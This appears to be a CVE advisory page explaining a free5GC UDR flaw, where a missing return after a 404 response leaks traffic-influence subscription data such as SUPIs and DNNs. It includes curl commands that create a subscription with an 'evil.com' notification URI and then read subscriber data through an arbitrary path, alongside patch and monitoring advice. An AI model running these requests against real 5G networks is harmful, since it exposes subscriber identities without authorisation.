Listen to this Post
How the mentioned CVE works (around 20 lines):
The vulnerability exists in free5GC’s UDR service handling the GET endpoint /nudr-dr/v2/application-data/influenceData/{influenceId}/{subscriptionId}.
The expected `influenceId` must equal the literal string "subs-to-notify".
In the function `HandleApplicationDataInfluenceDataSubsToNotifySubscriptionIdGet` (file api_datarepository.go), a condition checks if influenceId != "subs-to-notify".
If true, it calls `c.String(http.StatusNotFound, “404 page not found”)` to send an HTTP 404 response.
However, the handler does not execute a `return` statement after sending the 404.
Thus, execution continues past the error condition.
The handler then proceeds to call `s.Processor().ApplicationDataInfluenceDataSubsToNotifySubscriptionIdGetProcedure(c, subscriptionId)`.
This processor function retrieves the Traffic Influence Subscription object associated with the provided `subscriptionId` from the database.
The retrieved subscription data (including SUPI, DNN, S-NSSAI, notificationUri) is then marshaled into the HTTP response body.
Critically, the HTTP status code remains 404 even though the body contains the full subscription object.
An attacker receives a response with `HTTP/1.1 404 Not Found` followed by the JSON payload.
The missing `return` after the 404 call is the root cause.
No authentication or special privileges are required; only network access to the 5G Service Based Interface (SBI) and a valid subscriptionId.
The `subscriptionId` can be obtained by creating a legitimate subscription (POST to the correct path) or by brute-forcing/guessing.
Because the path validation is ineffective, any arbitrary string in place of `subs-to-notify` triggers the flaw.
The attacker can thus read any subscription they have an ID for, bypassing the intended path restriction.
This leads to unauthorized information disclosure without any log indication of a successful data leak (the 404 masks the exfiltration).
The issue was patched by adding a `return` statement after the 404 response in the same function.
dailycve form:
Platform: free5GC UDR
Version: 4.2.1
Vulnerability: Path validation bypass
Severity: Medium
date: 2024-10-01 (estimated disclosure)
Prediction: Patch already available (2024-10-15)
What Undercode Say:
Identify vulnerable UDR endpoint
curl -X GET "http://<udr-host>/nudr-dr/v2/application-data/influenceData/ANYSTRING/<subscriptionId>"
Create a subscription to obtain valid subscriptionId
curl -X POST "http://<udr-host>/nudr-dr/v2/application-data/influenceData/subs-to-notify" \
-H "Content-Type: application/json" \
-d '{"notificationUri":"http://evil.com/notify","dnns":["internet"],"snssais":[{"sst":1,"sd":"000001"}],"supis":["imsi-222777483957498"]}'
Extract subscriptionId from 201 response (e.g., "87615e16")
Exploit via invalid influenceId
curl -v "http://<udr-host>/nudr-dr/v2/application-data/influenceData/WRONGID/87615e16"
Exploit:
Send GET request to `/nudr-dr/v2/application-data/influenceData/ARBITRARY/VALID_SUB_ID`
Observe HTTP 404 with leaked subscription JSON in body.
Protection from this CVE:
Upgrade free5GC to patched version (add `return` in api_datarepository.go).
If unpatched, restrict SBI access via firewall/network segmentation.
Monitor for 404 responses containing JSON payloads.
Impact:
Unauthenticated disclosure of SUPIs/IMSIs, DNNs, S-NSSAIs, notification URIs.
Compromises subscriber privacy and enables further attacks on 5G core.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

